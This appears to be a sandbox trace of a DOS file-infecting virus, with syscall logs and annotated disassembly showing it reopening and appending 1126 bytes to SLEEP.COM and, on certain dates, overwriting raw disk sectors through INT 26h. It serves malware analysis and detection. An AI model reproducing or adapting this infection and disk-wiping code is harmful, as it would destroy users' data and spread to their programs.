2018-12-25T12:45:11.716448498Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:11.720596906Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:11.722453122Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:11.739733156Z 62 PC: 12cac | Close file
2018-12-25T12:45:11.741604976Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:11.749090688Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:11.752127893Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:11.755060438Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:11.75858009Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:11.759706333Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:11.761253994Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:11.767428729Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:11.769802216Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:11.771326904Z 62 PC: 12d11 | Close file
2018-12-25T12:45:11.780991552Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:11.791255189Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:11.793873173Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:11.801622566Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:11.808305756Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:11.810428368Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:11.821937359Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:11.823900377Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:11.831224068Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:11.834567024Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:11.838106046Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:11.840825391Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:11.84249507Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:11.845157755Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:11.854719033Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:11.856996814Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:11.858548955Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:11.866631554Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:11.876892193Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:11.880122874Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:11.886946538Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:11.89352344Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:11.896418566Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:11.907280463Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:11.90893285Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:11.916263771Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:11.919071536Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:11.921572273Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:11.924732014Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:11.926450225Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:11.928791776Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:11.938530724Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:11.941585279Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:11.94391342Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:11.953768339Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:11.966357219Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:11.969159877Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:11.973959797Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:11.962618918Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:11.964482913Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:11.966450063Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:11.969067408Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:11.970501918Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:11.974480903Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:11.978442712Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:11.982825757Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:11.984951765Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:13.364204641Z 62 PC: 12cac | Close file
2018-12-25T12:45:13.366968058Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:13.530858407Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:13.537264056Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:13.539914553Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:13.542748214Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:13.544001786Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.546141889Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:13.646805394Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.648936329Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:13.650456725Z 62 PC: 12d11 | Close file
2018-12-25T12:45:13.826344634Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:13.948618394Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:13.951134973Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:13.957900419Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:13.964015089Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:13.965974374Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.179535524Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.181665453Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.194067322Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.205215497Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.208086133Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.210903553Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.213544298Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.216005675Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.224457197Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.227394466Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.228945112Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.236968238Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.247288698Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.249807646Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.256445176Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.264022003Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.265800305Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.272170526Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.273470699Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.278890403Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.280756487Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.282520954Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.28527873Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.286279971Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.287774437Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.293856761Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.295449819Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.296604975Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.30245882Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.309342882Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:14.311248591Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.316981193Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Trace row plus a linear disassembly window starting at the return address of
; INT 21h/AH=2Ah (Get date). DOS returns DL = day, DH = month, CX = year.
; The code gates a raw sector write (INT 26h) on the day of month.
2018-12-25T12:45:12.040745699Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2    ; day of month == 2 ?
0x12a5d: je 0x12a62                        ; match -> disk-write branch below
0x12a5f: jmp 0x12a80                       ; no match -> ret; presumably the path taken here (sandbox date on this page is 1980-01-01)
0x12a61: nop
0x12a62: cli                               ; interrupts off around the write
0x12a63: mov ah, 2
0x12a65: cdq                               ; one-byte opcode; in 16-bit code this is CWD (DX = sign of AX) - disassembler naming, verify
0x12a66: mov cx, 0x100                     ; CX = sector count for INT 26h (0x100 sectors)
0x12a69: int 0x26                          ; DOS absolute disk write: AL = drive, CX = count, DX = first sector, DS:BX = buffer
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3                         ; drive number 3 (0 = A:, so 3 = D:)
0x12a71: mov cx, 0x2bc                     ; 0x2bc sectors
0x12a74: mov dx, 0                         ; starting at logical sector 0
0x12a77: mov ds, word ptr [di + 0x63]      ; DS:BX buffer pointer loaded from the data area at DI
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62                      ; NOTE(review): 3-byte near call; with 16-bit IP wrap the target is likely 0x12a62 (the INT 26h block) - confirm
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]           ; past the ret; may be data or the next routine decoded by the linear sweep
2018-12-25T12:45:12.043265254Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:12.045443359Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:12.048123616Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:12.049316374Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:12.056103824Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:12.063159246Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
; Trace row plus disassembly window at the return address of INT 21h/AH=2Ch
; (Get time: CH = hour, CL = minute, DH = second, DL = hundredths).
; The code derives a byte from the clock, stores it, then clears the target
; file's attributes and reopens it read/write before the write calls.
2018-12-25T12:45:12.067519749Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh    ; DL = hundredths + seconds (time-derived byte)
0x12c90: je 0x12c8a                        ; zero result -> branch back before this window (presumably re-reads the clock)
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]          ; SI = 0x115 + word at DS:0x106 (looks like a base/delta for the appended body - confirm)
0x12c99: mov byte ptr [si], dl             ; NOTE(review): if this byte is a per-copy key or seed, infected copies differ and fixed byte signatures over the body are unreliable - confirm
0x12c9b: mov ax, 0x4301                    ; INT 21h AX=4301h: set file attributes
0x12c9e: xor cx, cx                        ; CX = 0 -> read-only/hidden/system bits cleared
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca                      ; DS:DX = SI + 0xCA, the path argument
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e                      ; close handle in BX (presumably the handle used for the 8-byte read)
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02                    ; open, access mode 2 = read/write
0x12caf: int 0x21
0x12cb1: jb 0x12c63                        ; CF set = open failed -> path outside this window
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax        ; save the returned handle at ES:[DX + 0x63]
0x12cb9: xchg ax, bx                       ; handle -> BX for the following calls
0x12cba: mov ah, 0x40                      ; AH=40h write; the INT itself is past the end of this window
2018-12-25T12:45:12.069056381Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:13.363181612Z 62 PC: 12cac | Close file
2018-12-25T12:45:13.365596344Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:13.373381729Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:13.517336173Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:13.519794793Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:13.522782133Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:13.523987898Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.525897835Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:13.606125426Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.608893459Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:13.610249226Z 62 PC: 12d11 | Close file
2018-12-25T12:45:13.754780197Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:13.850603876Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:13.853442207Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:13.861669216Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:13.868131523Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:13.870362102Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.106476129Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.108831711Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.115733359Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.119194215Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.122860944Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.126028747Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.128529665Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.130867963Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.181195957Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.190611902Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.192245415Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.20089728Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.211292966Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.214319825Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.221225587Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.228748874Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.2315117Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.24189756Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.244173277Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.249846072Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.251774295Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.253589048Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.256030292Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.257163049Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.258591052Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.264625184Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.26691855Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.268381761Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.275967091Z 67 PC: 12d22 | Get or set file attributes (See above)
; Trace row plus disassembly window at the return address of a second
; INT 21h/AH=2Ah (Get date) call. DX = (DH = month, DL = day) is compared
; with a fixed date. The bytes after the two jumps are swept linearly and
; include what looks like data followed by a misaligned function prologue.
2018-12-25T12:45:14.285698826Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606    ; month == 6 and day == 6 ?
0x12b73: je 0x12b78                        ; date matches -> 0x12d28 (outside this window)
0x12b75: jmp 0x12d94                       ; otherwise -> 0x12d94; presumably the path taken here (sandbox date on this page is 1980-01-01)
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh                        ; NOTE(review): from here to 0x12b83 probably data, not code
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl      ; NOTE(review): encoding 00 55 8B plus the next byte EC likely hides 55 / 8B EC = push bp; mov bp, sp - confirm against raw bytes
0x12b86: in al, dx                         ; likely the tail of mov bp, sp, not a real port read
0x12b87: sub sp, 0x2c                      ; 0x2c bytes of stack locals
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a                      ; INT 21h AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]      ; DTA = the stack buffer reserved above
0x12b93: int 0x21
0x12b95: mov ah, 0x4e                      ; AH=4Eh find first
0x12b97: mov cx, 0x10                      ; attribute mask 0x10 = directory
0x12b9a: mov dx, 0x1b8                     ; DS:DX = search pattern at offset 0x1b8; the INT is past the end of this window
2018-12-25T12:45:14.288104027Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.293412951Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:12.201890303Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:12.204402546Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:12.207415591Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:12.211295604Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:12.212777207Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:12.21858072Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:12.225021022Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:12.231415375Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:12.233837128Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:13.364948812Z 62 PC: 12cac | Close file
2018-12-25T12:45:13.36701148Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:13.373899154Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:13.585098369Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:13.588453811Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:13.591152029Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:13.59236934Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.594412314Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:13.662079532Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.664111722Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:13.665439571Z 62 PC: 12d11 | Close file
2018-12-25T12:45:13.826297398Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:13.948931031Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:13.951911639Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:13.959538768Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:13.965929019Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:13.967992728Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.180864396Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.184115199Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.191047127Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.194856323Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.197518168Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.200124193Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.202306362Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.204654434Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.213127313Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.215544512Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.217404473Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.226926069Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.23717847Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.240279715Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.246710395Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.253582604Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.256781735Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.266519432Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.268715069Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.276238472Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.278953066Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.281506879Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.286068824Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.287665162Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.290077982Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.299429334Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.302070227Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.30383204Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.311632247Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.32339228Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:14.325857257Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.330115286Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:12.688680713Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:12.697638182Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:12.700338656Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:12.704171623Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:12.705881146Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:12.712425759Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:12.720724646Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:12.731075136Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
